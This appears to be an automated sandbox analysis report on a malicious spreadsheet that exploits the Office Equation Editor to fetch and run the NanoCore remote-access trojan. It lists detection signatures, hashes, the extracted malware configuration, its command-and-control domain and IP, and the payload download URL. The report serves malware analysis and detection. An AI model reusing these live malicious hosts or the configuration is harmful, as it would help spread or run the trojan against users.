Windows Analysis Report Import order764536.xlsx

Overview

General Information

Sample Name:	Import order764536.xlsx
Analysis ID:	501830
MD5:	cf9700bcf6687a0f9bc3b205b43b40ba
SHA1:	1bcc9522f4f8e1938939e2721b834c5f51cf81d1
SHA256:	61c38201d62bd19e606f4f4e78805932442d872aea57651ab949b96bbb6b4121
Tags:	VelvetSweatshopxlsx
Infos:
Most interesting Screenshot:

Detection

Nanocore

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: NanoCore

Yara detected AntiVM3

Detected Nanocore Rat

Yara detected AntiVM autoit script

Yara detected Nanocore RAT

Found malware configuration

Malicious sample detected (through community Yara rule)

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: File Dropped By EQNEDT32EXE

Multi AV Scanner detection for dropped file

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments

Allocates memory in foreign processes

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

Sigma detected: Execution from Suspicious Folder

Office equation editor drops PE file

Hides that the sample has been downloaded from the Internet (zone.identifier)

Uses schtasks.exe or at.exe to add and modify task schedules

Uses dynamic DNS services

Drops PE files with a suspicious file extension

Writes to foreign memory regions

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

C2 URLs / IPs found in malware configuration

Drops PE files to the user root directory

Antivirus or Machine Learning detection for unpacked file

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Sleep loop found (likely to delay execution)

Detected potential crypto function

Contains functionality to launch a process as a different user

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

Contains functionality to simulate keystroke presses

Contains long sleeps (>= 3 min)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Potential document exploit detected (unknown TCP traffic)

OS version to string mapping found (often used in BOTs)

PE file contains strange resources

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Contains functionality to retrieve information about pressed keystrokes

Drops PE files to the user directory

Dropped file seen in connection with other malware

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Contains functionality for read data from the clipboard

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to shutdown / reboot the system

Contains functionality to execute programs as a different user

Internet Provider seen in connection with other malware

Stores large binary data to the registry

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Contains functionality to communicate with device drivers

Contains functionality to read the clipboard data

Potential document exploit detected (performs DNS queries)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

File is packed with WinRar

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Detected TCP or UDP traffic on non-standard ports

Office Equation Editor has been started

Contains functionality to launch a program with higher privileges

Potential key logger detected (key state polling based)

Potential document exploit detected (performs HTTP gets)

Contains functionality to simulate mouse events

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Classification

Signatures

AV Detection:

Yara detected Nanocore RAT

Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.3a5d828.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.ae4629.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.39f7c18.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.3a5d828.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.ae0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.36e02a4.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3c4d828.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.ae0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.34ab46e.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.3933240.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3be7c18.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.36e02a4.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3be7c18.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.39f7c18.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.39f7c18.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.340000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.34b02a4.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.34b02a4.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3b23240.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.36db46e.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3c4d828.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.36e48cd.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3be7c18.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.3933240.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.39f7c18.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3be7c18.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.2d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.34b48cd.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000003.492083819.00000000039F7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.536331562.0000000003699000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.522442695.0000000003B82000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.666071975.0000000000342000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491934480.0000000004162000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491184816.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491143787.0000000003A6B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.490064589.0000000003901000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.521731464.0000000003C31000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.520532031.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.521599703.0000000003C5B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.490024327.00000000039C5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.667048040.0000000003900000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.522232406.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.667083533.0000000003AF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.667252127.00000000034A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.522514317.0000000003BE7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.535887495.00000000002D2000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.520588500.0000000003AF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.492022821.0000000003992000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.521632890.0000000003C1B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.522352198.0000000004232000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491708998.00000000039C5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.536291326.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.666422820.0000000000AE0000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491322689.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mmuiqlcvwo.pif PID: 2516, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2780, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mmuiqlcvwo.pif PID: 2568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 684, type: MEMORYSTR

Found malware configuration

Source: 0000000D.00000002.536331562.0000000003699000.00000004.00000001.sdmp

Malware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "c213d282-998c-4a04-8f80-944681ca", "Group": "nano stub", "Domain1": "ezeani.duckdns.org", "Domain2": "194.5.98.48", "Port": 8338, "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n <RegistrationInfo />\r\n <Triggers />\r\n <Principals>\r\n <Principal id=\"Author\">\r\n <LogonType>InteractiveToken</LogonType>\r\n <RunLevel>HighestAvailable</RunLevel>\r\n </Principal>\r\n </Principals>\r\n <Settings>\r\n <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n <AllowHardTerminate>true</AllowHardTerminate>\r\n <StartWhenAvailable>false</StartWhenAvailable>\r\n <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n <IdleSettings>\r\n <StopOnIdleEnd>false</StopOnIdleEnd>\r\n <RestartOnIdle>false</RestartOnIdle>\r\n </IdleSettings>\r\n <AllowStartOnDemand>true</AllowStartOnDemand>\r\n <Enabled>true</Enabled>\r\n <Hidden>false</Hidden>\r\n <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n <WakeToRun>false</WakeToRun>\r\n <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n <Priority>4</Priority>\r\n </Settings>\r\n <Actions Context=\"Author\">\r\n <Exec>\r\n <Command>\"#EXECUTABLEPATH\"</Command>\r\n <Arguments>$(Arg0)</Arguments>\r\n </Exec>\r\n </Actions>\r\n</Task"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Virustotal: Detection: 27%			Perma Link
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	ReversingLabs: Detection: 32%

Antivirus or Machine Learning detection for unpacked file

Source: 6.2.RegSvcs.exe.ae0000.4.unpack	Avira: Label: TR/NanoCore.fadte
Source: 6.2.RegSvcs.exe.340000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 13.2.RegSvcs.exe.2d0000.0.unpack	Avira: Label: TR/Dropper.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 97.107.138.110:443 -> 192.168.2.22:49166 version: TLS 1.2

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: vbc.exe, 00000004.00000000.447066106.0000000000292000.00000002.00020000.sdmp, vbc.exe.2.dr
Source:	Binary string: C:\Windows\RegSvcs.pdbpdbvcs.pdbegSvcs.pdb source: RegSvcs.exe, 00000006.00000002.666190763.000000000083D000.00000004.00000020.sdmp
Source:	Binary string: RegSvcs.pdb source: RegSvcs.exe, RegSvcs.exe, 0000000D.00000002.536198075.0000000000DA2000.00000020.00020000.sdmp, RegSvcs.exe.5.dr

Source: C:\Users\Public\vbc.exe	Code function: 4_2_0026A2DF FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	4_2_0026A2DF
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0027AFB9 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	4_2_0027AFB9
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00289FD3 FindFirstFileExA,	4_2_00289FD3
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FE399B GetFileAttributesW,FindFirstFileW,FindClose,	5_2_00FE399B
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FFBCB3 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,	5_2_00FFBCB3
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_01002408 FindFirstFileW,Sleep,FindNextFileW,FindClose,	5_2_01002408
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FF280D FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	5_2_00FF280D
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_01028877 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	5_2_01028877
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FE1A73 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	5_2_00FE1A73
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_0100CAE7 FindFirstFileW,FindNextFileW,FindClose,	5_2_0100CAE7
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_0100DE7C FindFirstFileW,FindClose,	5_2_0100DE7C
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FFBF17 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,	5_2_00FFBF17

Software Vulnerabilities:

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 97.107.138.110:80

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: demopicking.renova-sa.net

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49166 -> 97.107.138.110:443

Networking:

Uses dynamic DNS services

Source: unknown

DNS query: name: ezeani.duckdns.org

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: ezeani.duckdns.org
Source: Malware configuration extractor	URLs: 194.5.98.48

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /asdERTYgh56F.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: demopicking.renova-sa.net
Source: global traffic	HTTP traffic detected: GET /asdERTYgh56F.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: demopicking.renova-sa.netConnection: Keep-Alive

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: DANILENKODE DANILENKODE
Source: Joe Sandbox View	ASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 194.5.98.48 194.5.98.48

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 194.5.98.48:8338

Source: mmuiqlcvwo.pif.4.dr	String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: mmuiqlcvwo.pif.4.dr	String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: mmuiqlcvwo.pif.4.dr	String found in binary or memory: http://crl.globalsign.net/Timestamping1.crl0
Source: mmuiqlcvwo.pif.4.dr	String found in binary or memory: http://crl.globalsign.net/primobject.crl0N
Source: mmuiqlcvwo.pif.4.dr	String found in binary or memory: http://crl.globalsign.net/root.crl0
Source: mmuiqlcvwo.pif, 00000005.00000002.666654547.0000000002F70000.00000002.00020000.sdmp, RegSvcs.exe, 00000006.00000002.667678750.0000000005C00000.00000002.00020000.sdmp, taskeng.exe, 00000009.00000002.666152649.0000000001C10000.00000002.00020000.sdmp, mmuiqlcvwo.pif, 0000000C.00000002.666694262.0000000003150000.00000002.00020000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: mmuiqlcvwo.pif.4.dr	String found in binary or memory: http://secure.globalsign.net/cacert/ObjectSign.crt09
Source: mmuiqlcvwo.pif.4.dr	String found in binary or memory: http://secure.globalsign.net/cacert/PrimObject.crt0
Source: mmuiqlcvwo.pif, 00000005.00000002.666654547.0000000002F70000.00000002.00020000.sdmp, RegSvcs.exe, 00000006.00000002.667678750.0000000005C00000.00000002.00020000.sdmp, taskeng.exe, 00000009.00000002.666152649.0000000001C10000.00000002.00020000.sdmp, mmuiqlcvwo.pif, 0000000C.00000002.666694262.0000000003150000.00000002.00020000.sdmp	String found in binary or memory: http://www.%s.comPA
Source: mmuiqlcvwo.pif.4.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/0
Source: mmuiqlcvwo.pif.4.dr	String found in binary or memory: http://www.globalsign.net/repository/0
Source: mmuiqlcvwo.pif.4.dr	String found in binary or memory: http://www.globalsign.net/repository/03
Source: mmuiqlcvwo.pif.4.dr	String found in binary or memory: http://www.globalsign.net/repository09
Source: asdERTYgh56F[1].htm.2.dr	String found in binary or memory: https://demopicking.renova-sa.net/asdERTYgh56F.exe

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F4E77D3E.emf

Jump to behavior

Source: unknown

DNS traffic detected: queries for: demopicking.renova-sa.net

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 5_2_00FF2285 InternetQueryDataAvailable,InternetReadFile,

5_2_00FF2285

Source: global traffic	HTTP traffic detected: GET /asdERTYgh56F.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: demopicking.renova-sa.net
Source: global traffic	HTTP traffic detected: GET /asdERTYgh56F.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: demopicking.renova-sa.netConnection: Keep-Alive

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown	Network traffic detected: HTTP traffic on port 49166 -> 443

Source: unknown

HTTPS traffic detected: 97.107.138.110:443 -> 192.168.2.22:49166 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to retrieve information about pressed keystrokes

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 5_2_01006308 GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW,

5_2_01006308

Contains functionality for read data from the clipboard

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 5_2_0100A0FC OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

5_2_0100A0FC

Contains functionality to read the clipboard data

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 5_2_0101D91D OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

5_2_0101D91D

Installs a raw input device (often for capturing keystrokes)

Source: RegSvcs.exe, 00000006.00000002.667252127.00000000034A9000.00000004.00000001.sdmp

Binary or memory string: RegisterRawInputDevices

Potential key logger detected (key state polling based)

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 5_2_0102C7D6 SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

5_2_0102C7D6

E-Banking Fraud:

Yara detected Nanocore RAT

Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.3a5d828.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.ae4629.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.39f7c18.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.3a5d828.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.ae0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.36e02a4.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3c4d828.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.ae0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.34ab46e.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.3933240.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3be7c18.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.36e02a4.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3be7c18.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.39f7c18.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.39f7c18.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.340000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.34b02a4.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.34b02a4.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3b23240.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.36db46e.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3c4d828.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.36e48cd.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3be7c18.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.3933240.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.mmuiqlcvwo.pif.39f7c18.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.mmuiqlcvwo.pif.3be7c18.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.2d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegSvcs.exe.34b48cd.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000003.492083819.00000000039F7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.536331562.0000000003699000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.522442695.0000000003B82000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.666071975.0000000000342000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491934480.0000000004162000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491184816.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491143787.0000000003A6B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.490064589.0000000003901000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.521731464.0000000003C31000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.520532031.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.521599703.0000000003C5B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.490024327.00000000039C5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.667048040.0000000003900000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.522232406.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.667083533.0000000003AF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.667252127.00000000034A9000.00000004.00000001.sdmp, type: MEMORY
